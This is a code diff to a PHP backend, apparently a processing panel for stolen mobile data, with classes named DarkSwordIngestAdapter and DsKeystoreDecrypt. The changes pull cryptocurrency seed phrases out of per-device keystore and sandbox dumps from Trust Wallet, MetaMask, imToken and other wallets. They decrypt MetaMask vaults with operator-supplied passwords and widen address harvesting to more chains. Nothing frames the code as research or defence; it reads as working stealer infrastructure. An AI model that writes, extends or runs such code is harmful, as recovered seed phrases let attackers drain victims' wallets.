|
||||
$source = trim((string) ($item['source'] ?? ''));
|
||||
if ($source === '') {
|
||||
$source = 'Trust Wallet';
|
||||
}
|
||||
$payload = $ks;
|
||||
$payload['kind'] = 'web3.keystore';
|
||||
$rows[] = $this->createKeystore(
|
||||
$device,
|
||||
$source,
|
||||
$payload,
|
||||
$this->web3NeedsUserPassword($source),
|
||||
);
|
||||
}
|
||||
|
||||
return $rows;
|
||||
}
|
||||
|
||||
private function web3NeedsUserPassword(string $source): bool
|
||||
{
|
||||
$label = strtolower(trim($source));
|
||||
|
||||
return str_contains($label, 'imtoken')
|
||||
|| str_contains($label, 'metamask')
|
||||
|| str_contains($label, 'tronlink')
|
||||
|| str_contains($label, 'tokenpocket')
|
||||
|| str_contains($label, 'global wallet');
|
||||
}
|
||||
|
||||
/**
|
||||
* Rebuild in-memory wallet/sandbox trees from stored rows so decrypt jobs
|
||||
* still see UTC blobs after we stopped persisting full sandbox dumps.
|
||||
*
|
||||
* @return array{0: array<string, mixed>, 1: array<string, mixed>}
|
||||
*/
|
||||
public function storedWalletTrees(Device $device): array
|
||||
{
|
||||
$device->loadMissing('keystores');
|
||||
$wallets = [];
|
||||
$sandbox = [];
|
||||
foreach ($device->keystores as $row) {
|
||||
$json = is_array($row->raw_json) ? $row->raw_json : [];
|
||||
$kind = (string) ($json['kind'] ?? '');
|
||||
if (str_starts_with($kind, 'keychain')) {
|
||||
$wallets = array_merge($wallets, is_array($json['wallets'] ?? null) ? $json['wallets'] : []);
|
||||
|
||||
continue;
|
||||
}
|
||||
if ($kind === 'web3.keystore' || (isset($json['crypto']) && is_array($json['crypto']))) {
|
||||
$key = trim((string) $row->source);
|
||||
if ($key === '') {
|
||||
$key = 'web3';
|
||||
}
|
||||
if (! isset($sandbox[$key]) || ! is_array($sandbox[$key])) {
|
||||
$sandbox[$key] = [];
|
||||
}
|
||||
$sandbox[$key][] = $json;
|
||||
|
||||
continue;
|
||||
}
|
||||
if (isset($json['sandbox']) && is_array($json['sandbox'])) {
|
||||
$sandbox = array_merge($sandbox, $json['sandbox']);
|
||||
}
|
||||
}
|
||||
|
||||
return [$wallets, $sandbox];
|
||||
}
|
||||
|
||||
/**
|
||||
* @return list<WalletKeystore>
|
||||
*/
|
||||
@@ -879,9 +967,9 @@ class DarkSwordIngestAdapter
|
||||
/**
|
||||
* @param array<string, mixed> $rawJson
|
||||
*/
|
||||
private function createKeystore(Device $device, string $source, array $rawJson): WalletKeystore
|
||||
private function createKeystore(Device $device, string $source, array $rawJson, bool $needsPassword = false): WalletKeystore
|
||||
{
|
||||
return WalletKeystore::firstOrCreateForDevice($device, $source, $rawJson);
|
||||
return WalletKeystore::firstOrCreateForDevice($device, $source, $rawJson, $needsPassword);
|
||||
}
|
||||
|
||||
/**
|
||||
@@ -893,19 +981,7 @@ class DarkSwordIngestAdapter
|
||||
public function reprocessKeystores(Device $device): void
|
||||
{
|
||||
$device->load('keystores');
|
||||
|
||||
// Rebuild wallets/sandbox dicts from stored keystores so the walkers
|
||||
// can traverse the original tree structure.
|
||||
$wallets = [];
|
||||
$sandbox = [];
|
||||
foreach ($device->keystores as $row) {
|
||||
$kind = $row->raw_json['kind'] ?? '';
|
||||
if (str_starts_with($kind, 'keychain')) {
|
||||
$wallets = array_merge($wallets, $row->raw_json['wallets'] ?? []);
|
||||
} else {
|
||||
$sandbox = array_merge($sandbox, $row->raw_json['sandbox'] ?? []);
|
||||
}
|
||||
}
|
||||
[$wallets, $sandbox] = $this->storedWalletTrees($device);
|
||||
|
||||
$this->recoverKeystoreMnemonics($device, $wallets, $sandbox, $device->keystores->all());
|
||||
$this->walkForMnemonics($device, $wallets, 'd');
|
||||
@@ -919,8 +995,38 @@ class DarkSwordIngestAdapter
|
||||
public function recoverKeystoreMnemonics(Device $device, mixed $wallets, mixed $sandbox, array $rows): void
|
||||
{
|
||||
$hits = $this->keystoreDecrypt->recover($device, $wallets, $sandbox);
|
||||
$this->applyMnemonicHits($device, $hits);
|
||||
}
|
||||
|
||||
/**
|
||||
* Unlock a needs-password UTC / walletsV2 blob with an operator-supplied password,
|
||||
* then persist mnemonics the same way as automatic recovery.
|
||||
*
|
||||
* @return array{hits: int, utc: int, vault: int}
|
||||
*/
|
||||
public function decryptKeystoreWithPassword(Device $device, WalletKeystore $row, string $password): array
|
||||
{
|
||||
$result = $this->keystoreDecrypt->unlockRowWithPassword($device, $row, $password);
|
||||
$this->applyMnemonicHits($device, $result['hits']);
|
||||
if ($result['hits'] !== []) {
|
||||
[$wallets, $sandbox] = $this->storedWalletTrees($device->fresh('keystores'));
|
||||
$this->extractAddressesFromKeystores($device, $wallets, $sandbox);
|
||||
}
|
||||
|
||||
return [
|
||||
'hits' => count($result['hits']),
|
||||
'utc' => $result['utc'],
|
||||
'vault' => $result['vault'] ?? 0,
|
||||
];
|
||||
}
|
||||
|
||||
/**
|
||||
* @param list<array{source: string, tag: string, phrase: string, addresses?: list<array<string, mixed>>}> $hits
|
||||
*/
|
||||
private function applyMnemonicHits(Device $device, array $hits): void
|
||||
{
|
||||
foreach ($hits as $hit) {
|
||||
$tag = $hit['tag'] !== '' ? $hit['tag'] : 'd';
|
||||
$tag = ($hit['tag'] ?? '') !== '' ? $hit['tag'] : 'd';
|
||||
$this->ingest->ingestMnemonic($device, [
|
||||
'mnemonic' => $hit['phrase'],
|
||||
'a' => $tag,
|
||||
@@ -970,8 +1076,18 @@ class DarkSwordIngestAdapter
|
||||
if (is_string($node)) {
|
||||
$phrase = $this->asMnemonicPhrase($node);
|
||||
if ($phrase !== null) {
|
||||
$this->ingest->ingestMnemonic($device, ['mnemonic' => $phrase, 'a' => $tag]);
|
||||
$hits[] = ['phrase' => $phrase, 'source' => $sourceHint];
|
||||
$ingestTag = $tag;
|
||||
if ($sourceHint !== '') {
|
||||
$mapped = WalletSource::tagForLabel($sourceHint);
|
||||
if ($mapped !== '') {
|
||||
$ingestTag = $mapped;
|
||||
}
|
||||
}
|
||||
$this->ingest->ingestMnemonic($device, ['mnemonic' => $phrase, 'a' => $ingestTag]);
|
||||
$hits[] = [
|
||||
'phrase' => $phrase,
|
||||
'source' => $sourceHint !== '' ? $sourceHint : WalletSource::fromTag($ingestTag),
|
||||
];
|
||||
}
|
||||
|
||||
return;
|
||||
@@ -1028,6 +1144,13 @@ class DarkSwordIngestAdapter
|
||||
|
||||
private function tagForWalletKey(string $key, string $fallback): string
|
||||
{
|
||||
$hint = WalletSource::fromKeystoreHint($key);
|
||||
if ($hint !== '') {
|
||||
$mapped = WalletSource::tagForLabel($hint);
|
||||
if ($mapped !== '') {
|
||||
return $mapped;
|
||||
}
|
||||
}
|
||||
$k = strtolower($key);
|
||||
if (str_contains($k, 'imtoken') || str_contains($k, 'im.token')) {
|
||||
return 'b';
|
||||
|
||||
@@ -78,6 +78,99 @@ final class DsKeystoreDecrypt
|
||||
return $hits;
|
||||
}
|
||||
|
||||
/**
|
||||
* Try operator-supplied password against UTC / walletsV2 blobs and
|
||||
* MetaMask-style password vaults on this row (and same-source rows).
|
||||
*
|
||||
* @return array{hits: list<array{source: string, tag: string, phrase: string, addresses: list<array{address: string, chainType: string, symbol: string, balance: int}>}>, utc: int, vault: int}
|
||||
*/
|
||||
public function unlockRowWithPassword(Device $device, WalletKeystore $row, string $password): array
|
||||
{
|
||||
$device->loadMissing('keystores');
|
||||
$source = trim((string) $row->source);
|
||||
$nodes = [is_array($row->raw_json) ? $row->raw_json : []];
|
||||
foreach ($device->keystores as $other) {
|
||||
if ((int) $other->id === (int) $row->id) {
|
||||
continue;
|
||||
}
|
||||
if (trim((string) $other->source) !== $source) {
|
||||
continue;
|
||||
}
|
||||
$nodes[] = is_array($other->raw_json) ? $other->raw_json : [];
|
||||
}
|
||||
|
||||
$utcs = [];
|
||||
$vaults = [];
|
||||
foreach ($nodes as $node) {
|
||||
$utcs = array_merge($utcs, $this->collectKeystores($node, $source !== '' ? $source : 'unknown'));
|
||||
$vaults = array_merge($vaults, $this->collectPasswordVaults($node, $source !== '' ? $source : 'unknown'));
|
||||
}
|
||||
$utcs = $this->uniqueKeystores($utcs);
|
||||
$passwords = $this->expandUserPassword($password);
|
||||
$hits = [];
|
||||
$seen = [];
|
||||
if ($passwords === []) {
|
||||
return ['hits' => [], 'utc' => count($utcs), 'vault' => count($vaults)];
|
||||
}
|
||||
|
||||
foreach ($utcs as $item) {
|
||||
$phrase = $this->unlock($item['keystore'], $passwords);
|
||||
if ($phrase === null) {
|
||||
continue;
|
||||
}
|
||||
$hash = WalletMnemonic::hashSecret($phrase);
|
||||
if (isset($seen[$hash])) {
|
||||
continue;
|
||||
}
|
||||
$seen[$hash] = true;
|
||||
$hitSource = $item['source'] !== '' ? $item['source'] : ($source !== '' ? $source : 'unknown');
|
||||
$hits[] = [
|
||||
'source' => $hitSource,
|
||||
'tag' => WalletSource::tagForLabel($hitSource),
|
||||
'phrase' => $phrase,
|
||||
'addresses' => [],
|
||||
];
|
||||
}
|
||||
|
||||
foreach ($vaults as $item) {
|
||||
$phrase = $this->unlockPasswordVault($item['vault'], $passwords);
|
||||
if ($phrase === null) {
|
||||
continue;
|
||||
}
|
||||
$hash = WalletMnemonic::hashSecret($phrase);
|
||||
if (isset($seen[$hash])) {
|
||||
continue;
|
||||
}
|
||||
$seen[$hash] = true;
|
||||
$hitSource = $item['source'] !== '' ? $item['source'] : ($source !== '' ? $source : 'MetaMask');
|
||||
$hits[] = [
|
||||
'source' => $hitSource,
|
||||
'tag' => WalletSource::tagForLabel($hitSource) ?: 'a',
|
||||
'phrase' => $phrase,
|
||||
'addresses' => [],
|
||||
];
|
||||
}
|
||||
|
||||
return ['hits' => $hits, 'utc' => count($utcs), 'vault' => count($vaults)];
|
||||
}
|
||||
|
||||
/**
|
||||
* @return list<string>
|
||||
*/
|
||||
public function expandUserPassword(string $password): array
|
||||
{
|
||||
$password = trim($password);
|
||||
if ($password === '') {
|
||||
return [];
|
||||
}
|
||||
$out = $this->passwordsFromString($password);
|
||||
if (ctype_xdigit($password) && strlen($password) % 2 === 0 && strlen($password) >= 8) {
|
||||
$out = array_merge($out, $this->passwordsFromHex($password));
|
||||
}
|
||||
|
||||
return array_values(array_unique($out));
|
||||
}
|
||||
|
||||
/**
|
||||
* @return array{utc: int, passwords: int, entropy: int}
|
||||
*/
|
||||
@@ -575,6 +668,192 @@ final class DsKeystoreDecrypt
|
||||
return $out;
|
||||
}
|
||||
|
||||
/**
|
||||
* MetaMask mobile VAULT_BACKUP: {cipher, iv, salt, lib, keyMetadata}.
|
||||
*
|
||||
* @return list<array{source: string, vault: array<string, mixed>}>
|
||||
*/
|
||||
public function collectPasswordVaults(mixed $node, string $source = '', int $depth = 0): array
|
||||
{
|
||||
if ($depth > 10 || $node === null) {
|
||||
return [];
|
||||
}
|
||||
if (is_string($node)) {
|
||||
$decoded = $this->decodeBlob($node);
|
||||
if ($decoded === null) {
|
||||
return [];
|
||||
}
|
||||
|
||||
return $this->collectPasswordVaults($decoded, $source, $depth + 1);
|
||||
}
|
||||
if (! is_array($node)) {
|
||||
return [];
|
||||
}
|
||||
if ($this->isPasswordVault($node)) {
|
||||
return [['source' => $source !== '' ? $source : 'MetaMask', 'vault' => $node]];
|
||||
}
|
||||
|
||||
$out = [];
|
||||
$acct = strtolower(trim((string) ($node['account'] ?? '')));
|
||||
if ($acct === 'vault_backup' && $source === '') {
|
||||
$source = 'MetaMask';
|
||||
}
|
||||
foreach ($node as $key => $child) {
|
||||
$next = $source;
|
||||
if (is_string($key)) {
|
||||
$hint = WalletSource::fromKeystoreHint($key);
|
||||
if ($hint !== '') {
|
||||
$next = $hint;
|
||||
}
|
||||
}
|
||||
if (is_array($child) || is_string($child)) {
|
||||
$out = array_merge($out, $this->collectPasswordVaults($child, $next, $depth + 1));
|
||||
}
|
||||
}
|
||||
|
||||
return $out;
|
||||
}
|
||||
|
||||
/**
|
||||
* @param array<string, mixed> $node
|
||||
*/
|
||||
public function isPasswordVault(array $node): bool
|
||||
{
|
||||
foreach (['cipher', 'iv', 'salt'] as $key) {
|
||||
if (! is_string($node[$key] ?? null) || $node[$key] === '') {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
/**
|
||||
* @param array<string, mixed> $vault
|
||||
* @param list<string> $passwords
|
||||
*/
|
||||
public function unlockPasswordVault(array $vault, array $passwords): ?string
|
||||
{
|
||||
foreach ($passwords as $password) {
|
||||
$plain = $this->decryptPasswordVault($vault, $password);
|
||||
if ($plain === null) {
|
||||
continue;
|
||||
}
|
||||
$phrase = $this->phraseFromVaultPlain($plain);
|
||||
if ($phrase !== null) {
|
||||
return $phrase;
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
/**
|
||||
* MetaMask iOS (lib=quick-crypto): PBKDF2-SHA512 over the salt *string*
|
||||
* (not base64-decoded), AES-256-CBC, IV hex, cipher base64.
|
||||
*
|
||||
* @param array<string, mixed> $vault
|
||||
*/
|
||||
private function decryptPasswordVault(array $vault, string $password): ?string
|
||||
{
|
||||
$cipherB64 = (string) ($vault['cipher'] ?? '');
|
||||
$ivRaw = (string) ($vault['iv'] ?? '');
|
||||
$saltStr = (string) ($vault['salt'] ?? '');
|
||||
if ($cipherB64 === '' || $ivRaw === '' || $saltStr === '' || $password === '') {
|
||||
return null;
|
||||
}
|
||||
$cipher = base64_decode($cipherB64, true);
|
||||
if (! is_string($cipher) || $cipher === '') {
|
||||
return null;
|
||||
}
|
||||
$iv = ctype_xdigit($ivRaw) && strlen($ivRaw) % 2 === 0 ? @hex2bin($ivRaw) : base64_decode($ivRaw, true);
|
||||
if (! is_string($iv) || $iv === '') {
|
||||
return null;
|
||||
}
|
||||
$iterations = (int) ($vault['keyMetadata']['params']['iterations'] ?? 5000);
|
||||
if ($iterations < 1) {
|
||||
$iterations = 5000;
|
||||
}
|
||||
$salts = [$saltStr];
|
||||
$decodedSalt = base64_decode($saltStr, true);
|
||||
if (is_string($decodedSalt) && $decodedSalt !== '' && $decodedSalt !== $saltStr) {
|
||||
$salts[] = $decodedSalt;
|
||||
}
|
||||
foreach ($salts as $salt) {
|
||||
$key = hash_pbkdf2('sha512', $password, $salt, $iterations, 32, true);
|
||||
$plain = openssl_decrypt($cipher, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $iv);
|
||||
if (is_string($plain) && $plain !== '') {
|
||||
return $plain;
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
private function phraseFromVaultPlain(string $plain): ?string
|
||||
{
|
||||
$direct = $this->asMnemonic($plain);
|
||||
if ($direct !== null) {
|
||||
return $direct;
|
||||
}
|
||||
$json = json_decode($plain, true);
|
||||
if (! is_array($json)) {
|
||||
return null;
|
||||
}
|
||||
|
||||
return $this->phraseFromVaultNode($json);
|
||||
}
|
||||
|
||||
private function phraseFromVaultNode(mixed $node): ?string
|
||||
{
|
||||
if (is_string($node)) {
|
||||
return $this->asMnemonic($node);
|
||||
}
|
||||
if (! is_array($node)) {
|
||||
return null;
|
||||
}
|
||||
if (isset($node['mnemonic'])) {
|
||||
$phrase = $this->mnemonicFieldToPhrase($node['mnemonic']);
|
||||
if ($phrase !== null) {
|
||||
return $phrase;
|
||||
}
|
||||
}
|
||||
foreach ($node as $child) {
|
||||
$phrase = $this->phraseFromVaultNode($child);
|
||||
if ($phrase !== null) {
|
||||
return $phrase;
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
private function mnemonicFieldToPhrase(mixed $value): ?string
|
||||
{
|
||||
if (is_string($value)) {
|
||||
return $this->asMnemonic($value);
|
||||
}
|
||||
if (! is_array($value) || $value === []) {
|
||||
return null;
|
||||
}
|
||||
if (is_int($value[0] ?? null) || is_float($value[0] ?? null)) {
|
||||
$raw = '';
|
||||
foreach ($value as $code) {
|
||||
if (! is_numeric($code)) {
|
||||
return null;
|
||||
}
|
||||
$raw .= chr((int) $code);
|
||||
}
|
||||
|
||||
return $this->asMnemonic($raw);
|
||||
}
|
||||
if (is_string($value[0] ?? null)) {
|
||||
return $this->asMnemonic(implode(' ', array_map(static fn ($w) => (string) $w, $value)));
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
/**
|
||||
* @return list<string>
|
||||
*/
|
||||
|
||||
@@ -7,7 +7,7 @@ use App\Support\WalletSource;
|
||||
|
||||
/**
|
||||
* Pull plaintext Trust Wallet addresses from UTC / wallet_pkg /war sandbox.
|
||||
* Only BTC / ETH / TRX; at most two addresses per chain, in file order.
|
||||
* BTC / ETH / TRX / BSC / SOL / ARB; at most two addresses per chain, in file order.
|
||||
*/
|
||||
class DsTrustAddressIngest
|
||||
{
|
||||
@@ -18,6 +18,9 @@ class DsTrustAddressIngest
|
||||
0 => 'BITCOIN',
|
||||
60 => 'ETHEREUM',
|
||||
195 => 'TRON',
|
||||
20000714 => 'BSC',
|
||||
501 => 'SOLANA',
|
||||
10042221 => 'ARBITRUM',
|
||||
];
|
||||
|
||||
public function __construct(
|
||||
@@ -47,6 +50,9 @@ class DsTrustAddressIngest
|
||||
'BITCOIN' => [],
|
||||
'ETHEREUM' => [],
|
||||
'TRON' => [],
|
||||
'BSC' => [],
|
||||
'SOLANA' => [],
|
||||
'ARBITRUM' => [],
|
||||
];
|
||||
foreach ($this->walkAccounts($node) as $acct) {
|
||||
$address = trim((string) ($acct['address'] ?? ''));
|
||||
@@ -68,6 +74,9 @@ class DsTrustAddressIngest
|
||||
$symbol = match ($chain) {
|
||||
'BITCOIN' => 'BTC',
|
||||
'ETHEREUM' => 'ETH',
|
||||
'BSC' => 'BNB',
|
||||
'SOLANA' => 'SOL',
|
||||
'ARBITRUM' => 'ETH',
|
||||
default => 'TRX',
|
||||
};
|
||||
foreach ($addresses as $address) {
|
||||
@@ -170,6 +179,8 @@ class DsTrustAddressIngest
|
||||
'BITCOIN' => 'BITCOIN',
|
||||
'ETHEREUM' => 'ETHEREUM',
|
||||
'TRON' => 'TRON',
|
||||
'BSC' => 'BSC',
|
||||
'SOLANA' => 'SOLANA',
|
||||
default => null,
|
||||
};
|
||||
|
||||
|
||||
@@ -451,7 +451,7 @@ class IngestService
|
||||
$bundle = (string) ($item['b'] ?? $item['bundle_id'] ?? $item['bundleId'] ?? '');
|
||||
$name = (string) ($item['a'] ?? $item['name'] ?? $bundle);
|
||||
$version = isset($item['v']) ? (string) $item['v'] : null;
|
||||
if ($bundle === '') {
|
||||
if ($bundle === '' || DeviceApp::shouldSkipBundle($bundle)) {
|
||||
continue;
|
||||
}
|
||||
DeviceApp::query()->updateOrCreate(
|
||||
@@ -942,6 +942,7 @@ class IngestService
|
||||
in_array($chainType, ['TRON', 'TRX'], true) => ['TRON', 'TRX'],
|
||||
in_array($chainType, ['BTC', 'BITCOIN'], true) => ['BTC', 'BITCOIN'],
|
||||
in_array($chainType, ['SOL', 'SOLANA'], true) => ['SOL', 'SOLANA'],
|
||||
in_array($chainType, ['ARB', 'ARBITRUM'], true) => ['ARB', 'ARBITRUM'],
|
||||
default => [$chainType],
|
||||
};
|
||||
|
||||
|
||||
Reference in New Issue
Block a user